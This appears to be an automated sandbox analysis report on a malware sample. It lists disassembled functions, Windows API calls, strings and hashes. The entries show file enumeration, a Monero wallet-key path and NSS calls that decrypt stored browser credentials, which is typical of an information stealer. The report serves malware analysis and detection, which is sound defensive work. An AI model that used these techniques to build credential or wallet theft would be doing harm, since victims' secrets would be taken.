Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 96ff777f30e23d064a63ab731055ed90cbe0caf5b3e407f81e73e36326beea3a
Instruction ID: e874938df3fba45cc9874fce4bc0eadc01b579c8be43d04bfbfc46742c532f1c
Opcode Fuzzy Hash: 96ff777f30e23d064a63ab731055ed90cbe0caf5b3e407f81e73e36326beea3a
Instruction Fuzzy Hash: D2F10570905319DFCB24CF26CD887AAB7B4EF46308F1441D9E869A3641DB31AE86CF95

Function 004838B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004838CC
FindFirstFileA.KERNEL32(?,?), ref: 004838E3
lstrcat.KERNEL32(?,?), ref: 00483935
StrCmpCA.SHLWAPI(?,00490F70), ref: 00483947
StrCmpCA.SHLWAPI(?,00490F74), ref: 0048395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00483C67
FindClose.KERNEL32(000000FF), ref: 00483C7C

Strings

%s%s, xrefs: 00483AAD
%s\%s, xrefs: 00483A6F
%s\%s, xrefs: 0048397A
%s\*, xrefs: 004838C0
%s\%s\%s, xrefs: 00483A4A

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: a5657bd70a1bf56d10627b56b04c34ba35714dd25221ecc488d4ece70c1e6427
Instruction ID: b39f13ef8626c6bc5478f10727f4eb11f41dae2d4786befab467f5ea60ea3518
Opcode Fuzzy Hash: a5657bd70a1bf56d10627b56b04c34ba35714dd25221ecc488d4ece70c1e6427
Instruction Fuzzy Hash: 51A152B2A00208ABDB24EFA4DC85FEE7379BF44701F04499DE50D96141EB799B84CF66

Function 6C64C4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C64C5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C64C6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C64C74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C64C7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C64C9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C64CC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C64CD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C64DB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C64DB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C64DB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C64DD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C64DE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C64E360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C64E432
memcpy.VCRUNTIME140(?,?,?), ref: 6C64E472

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 265f9bbbee3f3dbf5cf53418a8a4722814c2181566af3e436104a13b4ceeb600
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: E6339C71E0421ACFCB04CFA8C8806EDBBF2FF49314F288269D955AB755D731A946CB94

Function 6C60ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C60EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C60EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C611695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6116B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C611770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C611A3E

Strings

~q^l, xrefs: 6C60ED10
~q^l, xrefs: 6C60ED13

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~q^l$~q^l
API String ID: 3693777188-954253705
Opcode ID: 1472cf346db0ef560526b78f99b4c691b8a658858b21ad96c0e9ab4b8a8adab5
Instruction ID: d5772a4fe076152ee02a5df11b381394d2a76f72e103ccca2fdc75d458ae5f5b
Opcode Fuzzy Hash: 1472cf346db0ef560526b78f99b4c691b8a658858b21ad96c0e9ab4b8a8adab5
Instruction Fuzzy Hash: E6B31771E04219CFCF14CFA8C890ADDB7B2BF49305F2582A9D549ABB45D730A986CF94

Function 6C5FFD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C66E7B8), ref: 6C5FFF81
LeaveCriticalSection.KERNEL32(6C66E7B8), ref: 6C60022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C600240
EnterCriticalSection.KERNEL32(6C66E768), ref: 6C60025B
LeaveCriticalSection.KERNEL32(6C66E768), ref: 6C60027B

Strings

<jemalloc>, xrefs: 6C600D62, 6C600D76, 6C600DA7
: (malloc) Error in VirtualFree(), xrefs: 6C600D67, 6C600D7B, 6C600DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5FFE99, 6C5FFEB7, 6C5FFED3, 6C600DB8, 6C600DD3, 6C6019B4

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: afca61bd6fc06629327ba24eb03d4f865272e2a688d223cf50425760dc25bcd7
Instruction ID: 1ea94e98737ceec374865b3478c859a5ebc76896f117933b67a3e69b37398da4
Opcode Fuzzy Hash: afca61bd6fc06629327ba24eb03d4f865272e2a688d223cf50425760dc25bcd7
Instruction Fuzzy Hash: 18C2E231B057418FD718CF29CA80716BBE1BF85328F28C66DE4699BB95D771E801CB89

Function 00484570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00484580
RtlAllocateHeap.NTDLL(00000000), ref: 00484587
wsprintfA.USER32 ref: 004845A6
FindFirstFileA.KERNEL32(?,?), ref: 004845BD
StrCmpCA.SHLWAPI(?,00490FC4), ref: 004845EB
StrCmpCA.SHLWAPI(?,00490FC8), ref: 00484601
FindNextFileA.KERNEL32(000000FF,?), ref: 0048468B
FindClose.KERNEL32(000000FF), ref: 004846A0
lstrcat.KERNEL32(?,0110E788), ref: 004846C5
lstrcat.KERNEL32(?,0110D880), ref: 004846D8
lstrlen.KERNEL32(?), ref: 004846E5
lstrlen.KERNEL32(?), ref: 004846F6

Strings

%s\%s, xrefs: 0048461B
%s\*, xrefs: 0048459A

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 40028870190baf9fdffb26d7f1301a48a2e8a9f83e1d587a13ea0347aa35d99a
Instruction ID: 0b2f2967e3ff3bf4a77c855449ce0ac1d60f22c74338e47a54f76d66a283aef2
Opcode Fuzzy Hash: 40028870190baf9fdffb26d7f1301a48a2e8a9f83e1d587a13ea0347aa35d99a
Instruction Fuzzy Hash: F35156B5900218ABCB24FBB0DC89FED737DAB54300F405A99F60992150EF789B848F96

Function 0047ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0047ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0047ED55
StrCmpCA.SHLWAPI(?,00491538), ref: 0047EDAB
StrCmpCA.SHLWAPI(?,0049153C), ref: 0047EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0047F2AE
FindClose.KERNEL32(000000FF), ref: 0047F2C3

Strings

%s\*.*, xrefs: 0047ED32

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 8f5ada626392a02dd36c6cd65f6a8825534f998a829407d947c1dafea681aa94
Instruction ID: f3d0555e607baa478acdbb44acbc873ffda618b921fbbccb2609d0a85d104af9
Opcode Fuzzy Hash: 8f5ada626392a02dd36c6cd65f6a8825534f998a829407d947c1dafea681aa94
Instruction Fuzzy Hash: A8E1F2719111189AEB54FB61CC51EEE7338AF54304F4049EFB40A62052EE7C6F9ACF6A

Function 6C60D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C66E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D4F2
LeaveCriticalSection.KERNEL32(6C66E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D50B

Part of subcall function 6C5ECFE0: EnterCriticalSection.KERNEL32(6C66E784), ref: 6C5ECFF6
Part of subcall function 6C5ECFE0: LeaveCriticalSection.KERNEL32(6C66E784), ref: 6C5ED026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D52E
EnterCriticalSection.KERNEL32(6C66E7DC), ref: 6C60D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C60D6A6
LeaveCriticalSection.KERNEL32(6C66E7DC), ref: 6C60D712
LeaveCriticalSection.KERNEL32(6C66E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C61D1C5), ref: 6C60D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C60D7EA

Strings

<jemalloc>, xrefs: 6C60D827
: (malloc) Error initializing arena, xrefs: 6C60D82C

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 6fcec8b9fa79383ca06ae48778cdf2fd181dfeeaaa8e870f7aa85c0ddeeecb92
Instruction ID: 7053ec3db00d16b1c1b20a594730cf1f48ae1af49666a618f4073d6daccb1f22
Opcode Fuzzy Hash: 6fcec8b9fa79383ca06ae48778cdf2fd181dfeeaaa8e870f7aa85c0ddeeecb92
Instruction Fuzzy Hash: D991B671B047418FD718CF2AC69076AB7E1EB89318F144A2EE55AD7F81D730E845CB8A

Function 0047DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00490C2E), ref: 0047DE5E
StrCmpCA.SHLWAPI(?,004914C8), ref: 0047DEAE
StrCmpCA.SHLWAPI(?,004914CC), ref: 0047DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0047E3E0
FindClose.KERNEL32(000000FF), ref: 0047E3F2

Strings

\*.*, xrefs: 0047DE26

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 025494c8d02461faca97f4d3cda709eac2c716cf34d3e18693b36a6e8d5aec9c
Instruction ID: 7d9eba2c5624eb80f3a891cefba344bfbb66d497da41f071a47a7dae5029bdd3
Opcode Fuzzy Hash: 025494c8d02461faca97f4d3cda709eac2c716cf34d3e18693b36a6e8d5aec9c
Instruction Fuzzy Hash: A7F1B0718141189AEB15FB61CC95EEE7338AF14304F5049EFA40A62051EF7C6B9ACF7A

Function 0047C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0047C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0047C87C
PK11_GetInternalKeySlot.NSS3 ref: 0047C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0047C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0047C8EB
lstrcat.KERNEL32(?,00490B46), ref: 0047C943
lstrcat.KERNEL32(?,00490B47), ref: 0047C957
PK11_FreeSlot.NSS3(?), ref: 0047C961
lstrcat.KERNEL32(?,00490B4E), ref: 0047C978

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
